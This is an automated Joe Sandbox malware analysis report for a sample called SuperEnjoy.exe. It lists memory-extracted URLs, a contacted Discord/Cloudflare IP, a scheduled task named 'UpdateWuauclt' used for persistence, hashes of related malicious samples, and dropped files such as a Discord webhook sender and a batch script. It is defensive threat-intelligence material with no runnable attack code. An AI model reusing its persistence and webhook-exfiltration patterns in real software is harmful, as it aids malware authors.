                                                        http://busca.igbusca.com.br/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activitymshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.ask.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.priceminister.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.cjmall.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://search.centrum.cz/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.carterandcone.comlmshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://suche.t-online.de/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.google.it/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.auction.co.kr/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.ceneo.pl/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.amazon.de/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://sads.myspace.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://busca.buscape.com.br/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.pchome.com.tw/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://discord.com/#DiscordSendWebhook.exe, 00000005.00000002.212751915.0000000001198000.00000004.00000020.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://browse.guardian.co.uk/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://google.pchome.com.tw/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.rambler.ru/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                http://uk.search.yahoo.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://espanol.search.yahoo.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.ozu.es/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://search.sify.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://openimage.interpark.com/interpark.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://search.yahoo.co.jp/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://search.ebay.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.gmarket.co.kr/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.founder.com.cn/cn/bThemshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://search.nifty.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://searchresults.news.com.au/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.google.si/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.google.cz/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.soso.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.univision.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://discord.com/BDiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://search.ebay.it/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://images.joins.com/ui_c/fvc_joins.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.asharqalawsat.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://busca.orange.es/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://cnweb.search.live.com/results.aspx?q=mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://auto.search.msn.com/response.asp?MT=mshta.exe, 0000000A.00000002.676013549.000000000A930000.00000002.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://search.yahoo.co.jpmshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.target.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://buscador.terra.es/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.typography.netDmshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://fontfabrik.commshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://search.orange.co.uk/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.iask.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.tesco.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://cgi.search.biglobe.ne.jp/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://search.seznam.cz/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://suche.freenet.de/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://search.interpark.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                                                                                        		high

                                                                                                                        Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        162.159.128.233
                                                                                                                        		unknownUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                        Private

                                                                                                                        IP
                                                                                                                        192.168.2.1

                                                                                                                        General Information

                                                                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                                                                        Analysis ID:349595
                                                                                                                        Start date:06.02.2021
                                                                                                                        Start time:21:35:12
                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                        Overall analysis duration:0h 11m 22s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Sample file name:SuperEnjoy.exe
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                        Number of analysed new started processes analysed:40
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • HDC enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal80.evad.winEXE@680/11@3/2
                                                                                                                        EGA Information:Failed
                                                                                                                        HDC Information:
                                                                                                                        • Successful, ratio: 99.7% (good quality ratio 94.3%)
                                                                                                                        • Quality average: 86.9%
                                                                                                                        • Quality standard deviation: 26%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 52%
                                                                                                                        • Number of executed functions: 83
                                                                                                                        • Number of non-executed functions: 311
                                                                                                                        Cookbook Comments:
                                                                                                                        • Adjust boot time
                                                                                                                        • Enable AMSI
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        Warnings:
                                                                                                                        Show All
                                                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 52.255.188.83, 2.18.68.82, 67.27.159.254, 8.241.123.126, 8.241.11.126, 8.241.9.126, 8.248.135.254, 51.103.5.159, 51.104.144.132, 92.122.213.247, 92.122.213.194, 20.54.26.129, 204.79.197.200, 13.107.21.200
                                                                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        TimeTypeDescription
                                                                                                                        21:36:04API Interceptor6x Sleep call for process: DiscordSendWebhook.exe modified
                                                                                                                        21:36:11Task SchedulerRun new task: UpdateWuauclt path: C:\Users\user\Desktop\SuperEnjoy.exe

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        162.159.128.2330939489392303224233.exeGet hashmaliciousBrowse
                                                                                                                          0p8ufnbnaG.exeGet hashmaliciousBrowse
                                                                                                                            xs1ALnpMCT.exeGet hashmaliciousBrowse
                                                                                                                              Recibo de pago.xlsGet hashmaliciousBrowse
                                                                                                                                5Z6D2lAQBQ.exeGet hashmaliciousBrowse
                                                                                                                                  INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                    Synapse-X.exeGet hashmaliciousBrowse
                                                                                                                                      order-33738.exeGet hashmaliciousBrowse
                                                                                                                                        lyrvDJCi1i.exeGet hashmaliciousBrowse
                                                                                                                                          0939489392303224233.exeGet hashmaliciousBrowse
                                                                                                                                            h3dFAROdF3.exeGet hashmaliciousBrowse
                                                                                                                                              ELvNtSKy30.exeGet hashmaliciousBrowse
                                                                                                                                                YT0nfh456s.exeGet hashmaliciousBrowse
                                                                                                                                                  FN0I8IpN7c.exeGet hashmaliciousBrowse
                                                                                                                                                    RFQ Valves 664KU.exeGet hashmaliciousBrowse
                                                                                                                                                      Scan New-PO _ZBT PSB 181 173 183 Quote EndUser.exeGet hashmaliciousBrowse
                                                                                                                                                        nR2LUWaUVK.exeGet hashmaliciousBrowse
                                                                                                                                                          NEW URGENT ORDER FROM PUK ITALIA GROUP SRL.EXEGet hashmaliciousBrowse
                                                                                                                                                            Cxvof6xsPR.exeGet hashmaliciousBrowse
                                                                                                                                                              Cxvof6xsPR.exeGet hashmaliciousBrowse

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                discord.comInfoSender.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.136.232
                                                                                                                                                                Dropper.xlsmGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                Chrome.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.135.232
                                                                                                                                                                Matrix.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                0939489392303224233.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                b12d7feb3507461a.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                SecuriteInfo.com.Trojan.DownLoader36.32796.17922.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.137.232
                                                                                                                                                                Og8qU1smzy.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                0p8ufnbnaG.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                0p8ufnbnaG.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.137.232
                                                                                                                                                                UaTCQiQ6XK.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.135.232
                                                                                                                                                                0000098.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.135.232
                                                                                                                                                                DRAFT-KMBT-F33C6592-96F3-4015-8107_IMG.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.136.232
                                                                                                                                                                December SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.137.232
                                                                                                                                                                988119028872673623l.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.136.232
                                                                                                                                                                SecuriteInfo.com.Fareit-FZO54A4BE7037EC.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.135.232
                                                                                                                                                                xs1ALnpMCT.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                0I2ddZZKv7.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.136.232
                                                                                                                                                                Q2BZ01fmwK.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.136.232
                                                                                                                                                                Recibo de pago.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                CLOUDFLARENETUS099-563942-59-5095-73208.htmGet hashmaliciousBrowse
                                                                                                                                                                • 104.21.75.155
                                                                                                                                                                Inquiry pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.45685113.32456.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.23.98.190
                                                                                                                                                                61vPFITGkbgCrMT.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                rXiuAV2CjtcXJNE.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.198.10
                                                                                                                                                                AZ17.vbsGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.131.130
                                                                                                                                                                purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.21.19.200
                                                                                                                                                                PO77.vbsGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.131.130
                                                                                                                                                                HmGhAu4HlQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.17.63.50
                                                                                                                                                                02ca4397da55b3175aaa1ad2c99981e792f66151.exeGet hashmaliciousBrowse
                                                                                                                                                                • 1.2.3.1
                                                                                                                                                                7U8uE5kIaH.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                u6Wf8vCDUv.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.23.98.190
                                                                                                                                                                wMbMIqppdf.dllGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.196.231
                                                                                                                                                                drTj5hZSCU.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.223.209
                                                                                                                                                                aeq6IToVRq.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.17.62.50
                                                                                                                                                                BO61CeKOmR.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.17.63.50
                                                                                                                                                                Draft-BL No ONEYJKTAC6384600,PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.188.154
                                                                                                                                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.188.154
                                                                                                                                                                Purchase Order 2.5.21_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.21.19.200

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                bd0bf25947d4a37404f0424edf4db9adatiflash_293.sfx.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                atiflash_293.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                f_026dfd.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                lJV2MfkPFd.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                G6slMyq847.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                3DyjNG8LeF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                klzBd4IEfv.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                K4THUpcxOE.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                imVtKjcvlb.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                s8Jz7rG83l.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Mal.Generic-S.17165.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Mal.Generic-S.209.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.BehavesLike.Win32.Trojan.rc.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Mal.Generic-S.21423.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Mal.Generic-S.14175.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.FileRepMalware.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Trojan.Siggen11.52450.7582.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                SecuriteInfo.com.Generic.mg.37c47b019e49abae.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                Sgcarf9qSo.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                ce5f3254611a8c095a3d821d44539877MHIOfpMMs9.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                u6Wf8vCDUv.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                RJVPg3z2Pu.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                6GJRw5F2iT.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                rz53mugnLg.jsGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                dDnee1fKQh.jsGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                badjs.jsGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                hud_release_of_regulatory_agreement.jsGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                Recept.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                HIDRACINCA S.L. Pedido a proveedor Oferta N#U00ba 21000106.docxGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                ST33MQz3ZZ47fFjr8g09.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                ST33MQz3ZZ47fFjr8g09.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                form.txt.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                form.txt.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                aztlBj6FBt.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                vt5WM7St45.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                qy2ha7YNc2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                e5LZ9os33w.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                journal_of_pediatrics_authorship_agreement_and_contribution_form.jsGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                scpload.exeGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.128.233

                                                                                                                                                                Dropped Files

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeInfoSender.exeGet hashmaliciousBrowse
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeInfoSender.exeGet hashmaliciousBrowse

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe
                                                                                                                                                                    Process:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):988672
                                                                                                                                                                    Entropy (8bit):6.870063375918261
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:WAHnh+eWsN3skA4RV1Hom2KXMmHaWbK76Zu5:xh+ZkldoPK8YaWG+6
                                                                                                                                                                    MD5:FB7A78F485EC2586C54D60D293DD5352
                                                                                                                                                                    SHA1:D4E1F1061F7A872F9843E44C7D27D13BA7EF71BB
                                                                                                                                                                    SHA-256:B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
                                                                                                                                                                    SHA-512:B6635E849AB96740E5CEFEF3A874DC58CC26AA18CCC9CCA31E61E541C2DDEADE7EB59E524FC36DF22E0656884733F29D1143FFBF1CDD92FBD636D134D723C3E5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: InfoSender.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....}._.........."..........2....................@..........................p............@...@.......@.........................|.......,n......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...,n.......p...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat
                                                                                                                                                                    Process:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3575
                                                                                                                                                                    Entropy (8bit):5.610650035617315
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:O/3QpKgM3aNyYk1Jwr614K3f7k/M6V6E6o6B6n6Z6j6HX6I6V6z63i6j6V6V669Q:aApJHgwukaMwM08Ka7V0d
                                                                                                                                                                    MD5:E835405A7C500A96B4F760046CA1A843
                                                                                                                                                                    SHA1:F93ACE7FE24AFFA02A096661B4BF434DE3DE3C44
                                                                                                                                                                    SHA-256:B440531E313D5DF2EDC40CA7F98A2B4897B30069B50E66C3208D47118138610D
                                                                                                                                                                    SHA-512:A416923867DFDD06FBBA090EB1DE3B3EC244381F37F7C020694B09FD2D80B960DE57342FCA877602C6D6098718ADD3608820E60DCCA43D427449398543C76502
